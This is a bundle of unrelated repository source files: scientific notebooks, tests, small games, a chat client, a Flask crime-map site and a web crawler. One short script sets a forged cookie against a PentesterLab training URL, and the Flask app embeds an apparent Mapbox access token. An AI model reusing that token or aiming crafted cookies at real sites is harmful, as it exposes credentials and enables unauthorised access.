# # For more information, see the corresponding section in the [Stan user guide](https://mc-stan.org/docs/stan-users-guide/reparameterization-section.html). # In[10]: # reparameterized model block stan_code_model = '''model { real obs_normalized; x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions sigma ~ exponential(1.0); // priors for parameters vmax ~ normal(0.15, 0.03); nuthalfsat ~ normal(0.17, 0.04); graz ~ normal(0.15, 0.04); mort_p ~ normal(0.02, 0.01); mort_z ~ normal(0.02, 0.005); bgconc_n1 ~ normal(0.01, 0.001); // (regular) bgconc_n2 ~ normal(0.66, 0.08); // (winter) bgconc_p1 ~ normal(0.11, 0.01); // (regular) bgconc_p2 ~ normal(0.05, 0.005); // (winter) bgconc_z1 ~ normal(0.09, 0.01); // (regular) bgconc_z2 ~ normal(0.05, 0.03); // (winter) mix1 ~ normal(0.01, 0.03); // (regular) mix2 ~ normal(0.19, 0.02); // (winter) for (iyear in 1:nyears){ wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0); wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0); } // fitting the observations for(i in 1:nobsvar){ for (iobs in 1:nobs){ obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i]; obs_normalized ~ std_normal(); } } } ''' # In[11]: # stitch together the updated code and compile it stan_code = stan_code_functions + stan_code_dataparams + stan_code_model model = pystan.StanModel(model_code=stan_code, model_name='NPZ') # In[12]: mcmc = model.sampling(data=stan_data, iter=2000) print(mcmc) # In[13]: q = (5,25,50,75,95) x_perc = np.percentile(mcmc['x'], q, axis=0) fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12)) for iax,ax in enumerate(axs.flat[:-1]): ax.plot(t, data[index,iax+1]) ax.fill_between(t, x_perc[0,:,iax], x_perc[-1,:,iax], alpha=0.2, color='C1') ax.fill_between(t, x_perc[1,:,iax], x_perc[-2,:,iax], alpha=0.5, color='C1') ax.plot(t, x_perc[2,:,iax], label='model', color='C1') ax.set_ylabel(data_names[iax+1]) ax.grid(True) axs[0].set_title('Narragansett Bay NPZ data and model posterior quantiles') ax = axs[-1] ax.plot(t, np.sum(data[index,1:],axis=1)) ax.fill_between(t, np.sum(x_perc[0,:,:],axis=1), np.sum(x_perc[-1,:,:],axis=1), alpha=0.2, color='C1') ax.fill_between(t, np.sum(x_perc[1,:,:],axis=1), np.sum(x_perc[-2,:,:],axis=1), alpha=0.5, color='C1') ax.plot(t, np.sum(x_perc[2,:,:],axis=1), label='model', color='C1') ax.set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0)) ax.grid(True)
811d4c6beed89125664d5495f5675efc4f51e2f2
3d18dbe77b052754e2a7a9bbaee9650a9fb410e2
/test/11-ignore-design-docs.py
ea7165e3f5b58d5a27a8d4f9da83c47858fcd920
[ "Apache-2.0" ]
permissive
apache/couchdb-mango
765ebceec2912acb9696fadf9ec8f3d244d604c6
312e2c45535913c190cdef51f6ea65066ccd89dc
refs/heads/master
2023-07-02T18:36:31.552696
2017-02-07T16:40:09
2017-03-31T17:25:17
30,287,956
39
23
Apache-2.0
2023-01-18T14:24:00
2015-02-04T08:00:05
Erlang
UTF-8
Python
false
false
1,106
py
# Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of # the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. import mango import unittest DOCS = [ { "_id": "_design/my-design-doc", }, { "_id": "54af50626de419f5109c962f", "user_id": 0, "age": 10, "name": "Jimi" }, { "_id": "54af50622071121b25402dc3", "user_id": 1, "age": 11, "name": "Eddie" } ] class IgnoreDesignDocsForAllDocsIndexTests(mango.DbPerClass): def test_should_not_return_design_docs(self): self.db.save_docs(DOCS) docs = self.db.find({"_id": {"$gte": None}}) assert len(docs) == 2
65c81b2c37dfa24b81ae8c97d1e1d2f37c8af03a
b926393a43850799f57b59202796d128c5b611ab
/main.py
162002374fe6c83445e2d99937a3a90f3ac936c1
[]
no_license
apustovitin/sea-battle
0435e697b2143e80fdd04cbabbd5a51f18536c0c
2546d9f296a7bd3a8e84af3bd0439b21180d27f6
refs/heads/master
2023-01-18T18:03:27.210594
2020-12-01T14:09:33
2020-12-01T14:09:33
317,479,808
0
0
null
null
null
null
UTF-8
Python
false
false
1,482
py
import curses import board_image from game import Game import random def moves_loop(game): if random.choice([False, True]): is_break, is_restart = game.computer_move() if is_break or is_restart: return is_break, is_restart while True: is_break, is_restart = game.player_move() if is_break or is_restart: return is_break, is_restart is_break, is_restart = game.computer_move() if is_break or is_restart: return is_break, is_restart def game_loop(stdscr): unknown_ships = [1, 1, 1, 1, 2, 2, 2, 3, 3, 4] while True: stdscr.clear() computer_board = board_image.BoardImage() player_board = board_image.BoardImage() player_board_image = board_image.BoardImage() game = Game(stdscr, ".\screen_layout.txt", unknown_ships, computer_board, player_board, player_board_image) game.place_computer_ships() game.print_screen_layout() is_break, is_restart = game.place_player_ships() if is_break: break if is_restart: continue is_break, is_restart = moves_loop(game) if is_break: break if is_restart: continue def main(): stdscr = curses.initscr() stdscr.clear() curses.noecho() curses.cbreak() curses.curs_set(0) stdscr.keypad(True) game_loop(stdscr) curses.endwin() if __name__ == '__main__': main()
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
5b565e331073a8b29f997c30b58d383806f7d5a8
/pizzeria/11_env/bin/easy_install-3.7
242566d7d779997c369a8ea2a01c7db939a5250b
[]
no_license
jeongwook/python_work
f403d5be9da6744e49dd7aedeb666a64047b248d
bba188f47e464060d5c3cd1f245d367da37827ec
refs/heads/master
2022-04-02T23:16:57.597664
2020-01-21T08:29:48
2020-01-21T08:29:48
227,506,961
0
0
null
null
null
null
UTF-8
Python
false
false
288
7
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3 # -*- coding: utf-8 -*- import re import sys from setuptools.command.easy_install import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
f37490ad07011a1845fa6775b2a3edffd1ff59fc
5141c8756e790847866c19d63744bd7c8033a51c
/docs/libs/reveal.js/3.7.0/plugin/multiplex/node_modules/bufferutil/build/config.gypi
508a69af90f898303ce883dba2be1aa581eebd58
[ "MIT" ]
permissive
al341801/EI1036_42
db6fceb4fdb9272b28f34c16ee520ce072c5810b
d1d2c1b86a134fc4c45ba4146002589f7bee27f3
refs/heads/master
2020-09-15T13:02:09.056697
2019-11-22T15:05:53
2019-11-22T15:05:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,286
gypi
# Do not edit. File was generated by node-gyp's "configure" step { "target_defaults": { "cflags": [], "default_configuration": "Release", "defines": [], "include_dirs": [], "libraries": [] }, "variables": { "asan": 0, "coverage": "false", "debug_devtools": "node", "debug_http2": "false", "debug_nghttp2": "false", "force_dynamic_crt": 0, "host_arch": "x64", "icu_data_file": "icudt60l.dat", "icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat", "icu_endianness": "l", "icu_gyp_path": "tools/icu/icu-generic.gyp", "icu_locales": "en,root", "icu_path": "deps/icu-small", "icu_small": "true", "icu_ver_major": "60", "llvm_version": 0, "node_byteorder": "little", "node_enable_d8": "false", "node_enable_v8_vtunejit": "false", "node_install_npm": "true", "node_module_version": 59, "node_no_browser_globals": "false", "node_prefix": "/", "node_release_urlbase": "https://nodejs.org/download/release/", "node_shared": "false", "node_shared_cares": "false", "node_shared_http_parser": "false", "node_shared_libuv": "false", "node_shared_nghttp2": "false", "node_shared_openssl": "false", "node_shared_zlib": "false", "node_tag": "", "node_use_bundled_v8": "true", "node_use_dtrace": "true", "node_use_etw": "false", "node_use_lttng": "false", "node_use_openssl": "true", "node_use_perfctr": "false", "node_use_v8_platform": "true", "node_without_node_options": "false", "openssl_fips": "", "openssl_no_asm": 0, "shlib_suffix": "59.dylib", "target_arch": "x64", "uv_parent_path": "/deps/uv/", "uv_use_dtrace": "true", "v8_enable_gdbjit": 0, "v8_enable_i18n_support": 1, "v8_enable_inspector": 1, "v8_no_strict_aliasing": 1, "v8_optimized_debug": 0, "v8_promise_internal_field_count": 1, "v8_random_seed": 0, "v8_trace_maps": 0, "v8_use_snapshot": "true", "want_separate_host_toolset": 0, "xcode_version": "7.0", "nodedir": "/Users/dllido/.node-gyp/9.3.0", "standalone_static_library": 1, "dry_run": "", "legacy_bundling": "", "save_dev": "", "browser": "", "commit_hooks": "true", "only": "", "viewer": "man", "also": "", "rollback": "true", "sign_git_commit": "", "audit": "true", "usage": "", "globalignorefile": "/usr/local/etc/npmignore", "init_author_url": "", "maxsockets": "50", "shell": "/bin/bash", "metrics_registry": "https://registry.npmjs.org/", "parseable": "", "shrinkwrap": "true", "init_license": "ISC", "timing": "", "if_present": "", "cache_max": "Infinity", "init_author_email": "", "sign_git_tag": "", "cert": "", "git_tag_version": "true", "local_address": "", "long": "", "preid": "", "fetch_retries": "2", "noproxy": "", "registry": "https://registry.npmjs.org/", "key": "", "message": "%s", "versions": "", "globalconfig": "/usr/local/etc/npmrc", "always_auth": "", "logs_max": "10", "prefer_online": "", "cache_lock_retries": "10", "global_style": "", "update_notifier": "true", "audit_level": "low", "heading": "npm", "fetch_retry_mintimeout": "10000", "offline": "", "read_only": "", "searchlimit": "20", "access": "", "json": "", "allow_same_version": "", "description": "true", "engine_strict": "", "https_proxy": "", "init_module": "/Users/dllido/.npm-init.js", "userconfig": "/Users/dllido/.npmrc", "cidr": "", "node_version": "9.3.0", "user": "", "auth_type": "legacy", "editor": "vi", "ignore_prepublish": "", "save": "true", "script_shell": "", "tag": "latest", "global": "", "progress": "true", "ham_it_up": "", "optional": "true", "searchstaleness": "900", "bin_links": "true", "force": "", "save_prod": "", "searchopts": "", "depth": "Infinity", "node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js", "rebuild_bundle": "true", "sso_poll_frequency": "500", "unicode": "true", "fetch_retry_maxtimeout": "60000", "ca": "", "save_prefix": "^", "scripts_prepend_node_path": "warn-only", "sso_type": "oauth", "strict_ssl": "true", "tag_version_prefix": "v", "dev": "", "fetch_retry_factor": "10", "group": "20", "save_exact": "", "cache_lock_stale": "60000", "prefer_offline": "", "version": "", "cache_min": "10", "otp": "", "cache": "/Users/dllido/.npm", "searchexclude": "", "color": "true", "package_lock": "true", "package_lock_only": "", "save_optional": "", "user_agent": "npm/6.7.0 node/v9.3.0 darwin x64", "ignore_scripts": "", "cache_lock_wait": "10000", "production": "", "save_bundle": "", "send_metrics": "", "init_version": "1.0.0", "node_options": "", "umask": "0022", "scope": "", "git": "git", "init_author_name": "", "onload_script": "", "tmp": "/var/folders/pb/2r7f4bq147bgw8b7s_x_s3900000gn/T", "unsafe_perm": "true", "prefix": "/usr/local", "link": "" } }
aab5b930200d680d23a2dbddf6c89da66a40ebc7
9460ee7136f277825b09e5f63675364461deacea
/GATE_Engine/libs/par/test/hierarchy.py
2f4e7fa88ecb974f8c8b074c616372ebccf3eb99
[ "MIT" ]
permissive
DocDonkeys/GATE_Engine
9c4a5376e10e20774c20ec3f069b973e754cb058
bb2868884c6eec0ef619a45b7e21f5cf3857fe1b
refs/heads/master
2020-07-27T09:18:46.947405
2019-12-30T16:16:11
2019-12-30T16:16:11
209,041,360
1
3
MIT
2020-02-19T16:32:08
2019-09-17T11:58:13
C++
UTF-8
Python
false
false
442
py
import json flare = json.load(open('flare.json')) print flare things = [] def traverse(node, parent): me = len(things) print '{:3} {}'.format(me, node['name']) things.append(parent) children = node.get('children', []) for child in children: traverse(child, me) traverse(flare, 0) for i in xrange(len(things)): print '{:3},'.format(things[i]), if (i + 1) % 12 == 0: print; print '---\n', len(things)
4069b0b957b7c70d0f9663a86dd1cecb18c73276
1069b21592cd0771d69618d292e0511ec98251d9
/visual_client10_9.py
09d08582ba82f4698edc446c1688a703a3d9fcb8
[]
no_license
12Dong/python-socket
6936fb6d7984c5948b31ce70837fab3437420b82
cdb754a104eb5a0ccdb260eea83a943ce67bf268
refs/heads/master
2021-08-24T14:06:05.261228
2017-12-10T04:42:05
2017-12-10T04:42:05
113,722,198
0
0
null
null
null
null
UTF-8
Python
false
false
4,415
py
# coding:utf-8 import socket import threading import sys from PyQt5.QtWidgets import QWidget,QApplication,QGridLayout,QLineEdit,QTextEdit,QLabel,QPushButton,QFrame from PyQt5 import QtCore,QtWidgets from PyQt5 import QtGui from PyQt5.QtGui import* from PyQt5.QtGui import QIcon host = 'localhost' port = 9999 username = '12Dong' class Log(QFrame): def __init__(self,s): super().__init__() self.initUI() self.s=s def initUI(self): self.setObjectName('main') self.Str = QLabel("Welcome to my chat room.Please input your nickname") self.Nickname = QLabel('Nickname : ') self.text = QLineEdit() self.btnStart = QPushButton("Start!") grid = QGridLayout() grid.setSpacing(10) grid.addWidget(self.Str,2,2,2,5) grid.addWidget(self.Nickname,3,1,3,1) grid.addWidget(self.text,3,2,3,4) grid.addWidget(self.btnStart,3,6,3,6) self.setLayout(grid) self.creationAction() self.setWindowTitle('Title') self.setGeometry(500, 500, 500, 300) with open('logbg.qss', 'r') as p: self.setStyleSheet(p.read()) self.show() def setNickname(self): name = str(self.text.text()) self.text.setText('') s.send(name.encode('utf-8')) c = Client(name) c.show() self.close() def creationAction(self): self.btnStart.clicked.connect(self.setNickname) class Client(QFrame): def __init__(self, name): super().__init__() self.Nickname = name self.initUI() def initUI(self): self.setWindowTitle('Client') self.setNameWidget = QWidget()# self.layout = QGridLayout(self)# self.setNameLayout = QGridLayout(self.setNameWidget)# self.btnSend = QPushButton('send')# self.input = QLineEdit()# self.chat = QTextEdit()# self.timer = QtCore.QTimer() self.messages = [] self.build() self.createAction() self.setWindowIcon(QIcon("mylove.ico")) self.Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) recvThread = threading.Thread(target=self.recvFromServer) # recvThread.start()# self.setGeometry(500,500,600,400) self.setWindowTitle('Communcation') with open('texteditbg.qss', 'r') as q: self.setStyleSheet(q.read()) def sendToServer(self): # global username text = str(self.input.text()) self.input.setText('') if text == 'Exit' or text=='': self.exit() try: s.send(text.encode('utf-8')) print('%s >> %s' % (username, text)) self.messages.append(self.Nickname+" : " + text ) except ConnectionAbortedError: print('Server closed this connection!') self.exit() except ConnectionResetError: print('Server is closed!') self.exit() def recvFromServer(self): # while 1: try: data = s.recv(1024).decode('utf-8') if not data: exit() print(data) self.messages.append(data) except ConnectionAbortedError: print('Server closed this connection!') self.exit() except ConnectionResetError: print('Server is closed!') self.exit() def showChat(self): # for m in self.messages: self.chat.append(m) self.messages = [] def exit(self): # s.close() sys.exit() def build(self): self.layout.addWidget(self.chat, 0, 0, 5, 4) self.layout.addWidget(self.input, 5, 0, 1, 3) self.layout.addWidget(self.btnSend, 5, 3) self.setLayout(self.layout) def createAction(self): self.btnSend.clicked.connect(self.sendToServer) self.timer.timeout.connect(self.showChat) self.timer.start(1000) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) address = ('127.0.0.1', 31500) Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) Sock.sendto(b'1',address) print(s.recv(1024).decode()) app = QApplication(sys.argv) log = Log(s) app.exec_() #10/4 实现socket通行 #10/6 实现pyqt5封装,界面优化 #10/9 实现udp通信 #made by 12Dong
61c547985ebd1624cef39b0279164ca64369bd8b
54a2ac1972aa12e97e1029dddac6908a0e457d1c
/ej22.py
d564606a9f466aa3698b9b3467e6bba2ad18706d
[]
no_license
bthecs/computacion-2
2e7b557ab365e74634772f58067b2bbe0ea5d1d3
69d54714da8f40fbef9a6635b4fe6b1b1638a11e
refs/heads/master
2023-03-18T22:38:21.953987
2019-12-11T15:42:25
2019-12-11T15:42:25
343,834,502
1
0
null
null
null
null
UTF-8
Python
false
false
647
py
from multiprocessing import Queue, Lock import threading import time import os def thread_function(x,l,q): l.acquire() time.sleep(1) q.put("mi PID es: %d,Nombre: %s, Thread %d,Proceso: %d"%(os.getpid(),threading.current_thread().getName(),threading.get_ident(),x)) l.release() def mostrarCola(q): while True: print(q.get()) if q.empty(): break if __name__ == "__main__": q = Queue() l = Lock() pid=os.getpid() for x in range(3): p1 = threading.Thread(target=thread_function, args=(x,l,q)) p1.start() time.sleep(1) p1.join() mostrarCola(q)
82355523e5e347b9831a1ae711165e2ece5d664f
4aae80d02949928e859ea9536051f59ed14ec918
/apartment/house_summary.py
12793965147a94786cc6eaa2e1738a092d991116
[]
no_license
xli1234/PythonProject
a6c5c61b8fb86d8b9b7dc2d39d3784db3184a46b
e2555e8befd086ac98881a91630b1260cf6709f0
refs/heads/master
2020-07-31T05:46:11.688485
2019-10-08T02:04:42
2019-10-08T02:04:42
210,504,536
4
3
null
null
null
null
UTF-8
Python
false
false
535
py
import pandas as pd def summary_house(): df = pd.read_csv('apartment/house_cache.csv') zip_area = {15213: 'Oakland', 15217: 'Squirrel Hill', 15232: 'Shadyside'} house_count = list(df[['Zip', 'Street']].groupby('Zip').count().values.reshape(3)) house_area = list(df[['Zip', 'Street']].groupby('Zip').count().index) print('All three areas'.rjust(20), str(sum(house_count)).rjust(5), 'houses/apartments') for i in range(len(house_area)): print(zip_area[house_area[i]].rjust(20), str(house_count[i]).rjust(5), 'houses/apartments')
36719882d3b660fcaa5d889e59fee49bb5b86525
a6ae6b2bb64b622338fc001b30a9f053717cc770
/toVOC/evaluation/evalute.py
ae710a548491b2f324491b17a26f860d2fca267c
[]
no_license
tianws/script
1bec9f549fd801b5848f33f243d32db5bdd61722
3ecf2bca42e8c6c7f6a964ddc42acc3e483387fc
refs/heads/master
2021-06-04T11:53:32.337079
2021-01-12T08:20:13
2021-01-12T08:20:13
98,512,027
0
0
null
null
null
null
UTF-8
Python
false
false
1,534
py
#!/usr/bin/env python # coding=utf-8 from __future__ import division, unicode_literals import argparse import logging import phodopus import squirrel import sys if sys.version_info.major == 2: from pathlib2 import Path else: from pathlib import Path if __name__ == '__main__': logging.basicConfig( format='%(levelname)s:%(message)s', level=logging.INFO) parser = argparse.ArgumentParser( description='通过比较现成的识别输出文件(log)和标注文件(txt),以测评车尾或车道的识别效果') parser.add_argument('log_pathname', action='store', type=Path) parser.add_argument('label_pathname', action='store', type=Path) group = parser.add_mutually_exclusive_group() group.add_argument( '-s', action='store_const', dest='module', const=squirrel, help='squirrel') group.add_argument( '-p', action='store_const', dest='module', const=phodopus, help='phodopus') args = parser.parse_args(sys.argv[1:]) if args.module is None: logging.error('You should choose -s or -p! See -h') tp_count, fp_count, fn_count = args.module.parse( args.log_pathname, args.label_pathname) precision, recall, fb_measure, _ = args.module.statistics( tp_count, fp_count, fn_count) logging.info('precision: {:.3}'.format(precision)) logging.info('recall: {:.3}'.format(recall)) logging.info('fb_measure: {:.3}'.format(fb_measure))
3ae6423a2a19cb9678453bb48e72fd82b6afb002
36a92a0af4e4fa2b8191ddb8b0f0b8ed15c2baca
/send-cookies.py
999fd98911a1e0cbd4ef3f5f1e1606a3e11aad21
[]
no_license
p4r7h/Python-script
043d6b70387f1834fac147e0ee88cfbb416ea205
45e0c39849c0a885b26db433cdfa94f885e1988b
refs/heads/main
2023-06-12T03:09:26.333375
2021-06-21T01:23:08
2021-06-21T01:23:08
344,584,712
0
0
null
null
null
null
UTF-8
Python
false
false
141
py
import requests url = 'http://ptl-e1cf1322-eb626166.libcurl.so/pentesterlab' x = requests.get(url, cookies = {'key': 'please'}) print(x.text)
f6e865c5110f9052fdbb39331313e2ca555771da
9e1f6ccb24740e5dc51c71b76ffc3df4f561453e
/app.py
4451f01d8c4e516275d05abca23045fda760067c
[]
no_license
AbbieKent/Analyzing-Atlanta-Crime
2ed7ed191b757482c1d3f42fb96da53a921b09ee
872ecb801b1abec1f41dd732ee9d6f88d70f6072
refs/heads/main
2023-03-17T17:44:25.125117
2021-03-15T21:11:42
2021-03-15T21:11:42
348,123,489
0
0
null
null
null
null
UTF-8
Python
false
false
1,506
py
from flask import Flask, render_template from flask import request, url_for, render_template, redirect import pandas as pd import numpy as np import pdb, os from os import environ import joblib from sklearn.model_selection import train_test_split from sklearn.preprocessing import OneHotEncoder from sklearn.compose import ColumnTransformer from sklearn.preprocessing import LabelEncoder from platform import python_version print(python_version()) # Create an instance of our Flask app. app = Flask(__name__) # Set route @app.route('/') def index(): print('STARTING! '*20) mapbox_access_token = "pk.eyJ1IjoiZGF2aWRjb3kiLCJhIjoiY2tqcHU1YzBzOHY4ZjJxcWpkNGI5b2h2MSJ9.CsPttIW0Q41kP2uOBN6n8g" # pdb.set_trace() print(os.getcwd()) # df = pd.read_csv('./static/data/data.csv') df = pd.read_csv('./static/data/data.csv') #df = df.head(5) return render_template('index.html', tables = [df.to_html(classes='female')], titles=['IDKLOL'], mapbox_access_token=mapbox_access_token) @app.route('/neighborhood') def neighborhood(): return render_template('neighborhood.html') @app.route('/typesofcrimes') def crime(): return render_template('crime.html') @app.route('/timeofyear') def year(): return render_template('Timeofyear.html') @app.route('/contactinfo') def contact(): return render_template('contactinfo.html') @app.route('/index') def homepage(): return render_template('index.html') if __name__ == "__main__": app.run(debug=True)
e7402159b694a4820f2b00e2af214a79f9043612
e965225b5b16feb3a8264980cdeff83342e1167c
/pythontask.py
a4b01f83681283f4550677aedce2dd6b39d9b2de
[]
no_license
challapavankumar/Archeville-Super-Archy-Tournament-task
7b8631fe448f04f9ed335327e1a2457c3bc8e5cf
d646a830865f5607193ca883a217974fb4e5a641
refs/heads/main
2023-01-31T15:03:21.658700
2020-12-18T06:11:14
2020-12-18T06:11:14
322,502,956
0
0
null
null
null
null
UTF-8
Python
false
false
1,858
py
rounds = int(input("No of rounds to play ")) scores={"A":50,"B":4,"C":3,"D":2,"E":1,"F":0} bonuscheck=[] bonusplayer=[] teams={"Gyrhuna":[{"Jaons Diak":0},{"Susu":0}], "Achni":[{"Milog":0},{"Tianlong":0}], "Bathar":[{"Pakhangba":0},{"Poubi Lai Paphal":0}]} teamno=len(teams) bonusteam={} teamscore={} def WhoWonTheMatch(teamscore): return [key for (key, value) in teamscore.items() if value == max(teamscore.values())] for team in teams: bonusteam[team]=0 teamscore[team]=0 players=0 for i in teams: players+=len(teams[i]) playerscores={} for r in range(rounds): for team in teams: bonuscheck=[] bonusplayer=[] teamscore[team]=0 for pl in teams[team]: key, value = list(pl.items())[0] temp=0 playerscore=(input("Enter the score of " +str(key)+str(" from team ")+team+" ")) if playerscore not in (["A","B","C","D","E","F"]): print("Please select the score from A-F") exit(0) bonuscheck.append(playerscore) bonusplayer.append(key) prefix=key if prefix not in playerscores: playerscores[prefix]=scores[playerscore] else: playerscores[prefix]+=scores[playerscore] temp=playerscores[prefix] teamscore[team]+=playerscores[prefix] if(len(set(bonuscheck))==1): bonusteam[team]+=2 teamscore[team]+=bonusteam[team] scores={key:value+1 if(key!="F") else value for key,value in(scores.items()) } print(playerscores) print(bonusteam) print(teamscore) print("Next Round") key=WhoWonTheMatch(teamscore)[0] print("Game over. {} won!!!".format(key))
3a605cd5f0f7781f3d75d4937b802eac9ac2dd09
4accbb2bb2f7cc2b6b5855afe52c1bb4561c8da6
/Unstructured Programs For Testing/CSVtoNumpy2.py
85b4f08e7b464e239c7ab173dd45a90b55e10ebf
[]
no_license
WrathTitan/DLNeuralNetwork
e993f37faca865c369138ea61b346f9a998ad690
c82ba35c1cf6cd20c573200d4c3f038e8f434d9e
refs/heads/master
2023-04-04T06:50:19.007794
2021-04-23T16:18:10
2021-04-23T16:18:10
307,389,978
0
0
null
2020-10-29T16:24:58
2020-10-26T13:57:02
Python
UTF-8
Python
false
false
565
py
import numpy as np import csv myarr=np.genfromtxt('superfilteredFinal.csv',delimiter=',') print(myarr) print(myarr.shape) print(myarr.T) print("Ended one file") mynewarr=np.genfromtxt('filteredFinal.csv',delimiter=',') awesomestuff=mynewarr[:,1:] print(awesomestuff) print(awesomestuff.shape) print(awesomestuff.T) #my_data=pd.read_csv('superfilteredFinal.csv',sep=',',header=None) #data_X=my_data.T #print(data_X) #print(data_X.shape) #my_data=pd.read_csv('filteredFinal.csv',sep=',',header=None).T #data_Y=my_data.iloc[1:,] #print(data_Y) #print(data_Y.shape)
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
a51854991671a4389902945578288da34845f8d9
/libs/Utility/__init__.py
413df21a5385589d95b5c2ec9bf735a694a5e504
[]
no_license
wuyou1102/DFM_B2
9210b4b8d47977c50d92ea77791f477fa77e5f83
69ace461b9b1b18a2269568110cb324c04ad4266
refs/heads/master
2020-04-13T18:54:20.045734
2019-06-17T12:46:23
2019-06-17T12:46:23
163,387,873
0
0
null
null
null
null
UTF-8
Python
false
false
297
py
# -*- encoding:UTF-8 -*- from libs.Utility import Logger import Alert as Alert import Random as Random from ThreadManager import append_thread from ThreadManager import is_alive from ThreadManager import query_thread from Common import * import ParseConfig as ParseConfig from Serial import Serial
407664d79d63688fa1904fc5d1148aa5d8d4d2ce
d1b6ca6d310d646b64385ed87fed71ccec1cb6e3
/about_page.py
d42e1a4def82ac173833b9d7e2fa07e51909c25b
[]
no_license
skaushikk/USCIS-tracker
7053d5af295632c8c1fa4ca0579cbf56e33497a4
1f4219c311f1a99a682fca6789e7922747338d2a
refs/heads/main
2023-04-24T18:08:03.714906
2021-05-09T02:16:55
2021-05-09T02:16:55
361,353,468
1
0
null
null
null
null
UTF-8
Python
false
false
1,714
py
import streamlit as st def app(): st.title('USCIS Case Status Analyzer') st.subheader('Check, Analyze and Predict USCIS Application Status') # st.markdown("<h3 style='text-align: right; color: gray;'>-- Kaushik Sirvole</h3>", unsafe_allow_html=True) with st.beta_expander("ABOUT", expanded=True): # st.subheader('ABOUT') st.write('USCIS Case Status Tracker app is built to help, people who have a pending ' 'application with the United States Citizenship and Immigration Services (USCIS)' 'by educating, tracking, predicting their case with respect to other similar ' 'applications. Similar applications are defined as those of the same kind, from same locations' 'and applied during similar times') st.write('The current indefinite uncertain timeline due to political climate, COVID protocols, ' 'resulted in unprecedented strain on USCIS servicing capabilities and consequently piling on ' 'extreme stress to the applicants with lives on hold waiting for the adjudication. ') st.write('Furthermore, this app provides a platform for more broader, indepth analysis and prediction') with st.beta_expander("DISCLAIMER", expanded=False): st.write('The application does not store any user information at all. All the information provided is from ' 'publicly available data.') with st.beta_expander("KNOWLEDGEBASE", expanded=False): st.write("The details on different types of forms, terminology can be found in the USCIS information pages" "https://www.uscis.gov/tools/a-z-index") # st.selectbox()
18b12259ea05cacdcb9d10fcdd104daa667751b6
4b59ace76840cbeb28f0fac19f128cd3959a7c3a
/catalog/api/v1/utility.py
4b15a94bb676733ffce5e82f091fc6cde3d1ce2c
[]
no_license
JoshuadeJong/ecommerce-microservice
2a8f4d2f091c459dc9bcb47c01904f21c478cf91
246c6d0eb014df2946874cafcddebea1e0eaa97d
refs/heads/master
2023-03-25T23:57:15.369285
2021-03-19T15:47:32
2021-03-19T15:47:32
null
0
0
null
null
null
null
UTF-8
Python
false
false
204
py
def item2dict(item_id, item) -> dict: return { "id": item_id, "name": item.name, "description": item.description, "price": item.price, "stock": item.stock }
bcfca9b47c82bc52528894a9459bda4232f48196
f582461cc398909906a1ca65fa250105319289d8
/spider_main.py
986f58a635f53e9861335c7fe8c902f544f9017e
[]
no_license
ITT13021/baike_spider
d0dd637074c99cd7a1b9d703b4406939ed745fbd
2a2eea68dd94bf15ec1769986554514c53a28854
refs/heads/master
2021-07-04T12:33:37.377379
2017-09-27T01:49:00
2017-09-27T01:49:00
104,868,967
0
0
null
null
null
null
UTF-8
Python
false
false
1,568
py
# coding=utf-8 from baike_spider import html_downloader from baike_spider import html_outputer from baike_spider import html_parser from baike_spider import url_manager class SpriderMain(object): def __init__(self): self.urls = url_manager.UrlManager() self.downloader = html_downloader.HtmlDownloader() self.parser = html_parser.HtmlParser() self.outputer = html_outputer.HtmlOutputer() def craw(self, root_url, count): i = 1 self.urls.add_new_url(root_url) while self.urls.has_new_url(): if count != 0: try: new_url = self.urls.get_new_url() print 'we are collecting in %d : %s' % (i, new_url) html_cont = self.downloader.download(new_url) new_urls, new_data = self.parser.parse(new_url, html_cont) self.urls.add_new_urls(new_urls) self.outputer.collect_data(new_data) except: print "collected failed in %d" % i i += 1 count -= 1 else: break self.outputer.output_html() if __name__ == "__main__": obj_spider = SpriderMain() root_url = raw_input("请输入您要爬取首个百度百科词条的页面,我们会搜索与其相关的词条,例如:https://baike.baidu.com/item/Python:" + "\n") count = input("请输入您要爬取词条的个数(爬取越多消耗时间越长哦!): ") obj_spider.craw(root_url, count)
9c49e6ca3bd2a42e53334ed4c4c2dee500c889b3
ee1db6398a73882e750c86257b43390c5ec2a654
/fpm/setup.py
84cf025ee77323c37d5387470fd713ac4504e1a1
[ "MIT" ]
permissive
gscigala/packet-generation
c795131e202e59d16fc99eca61008b850df9c6c5
137b2853e57756a9ade1af2e95c8b2839f401121
refs/heads/master
2021-01-23T03:12:48.984559
2017-04-04T13:50:46
2017-04-04T13:50:46
86,057,836
0
0
null
null
null
null
UTF-8
Python
false
false
3,869
py
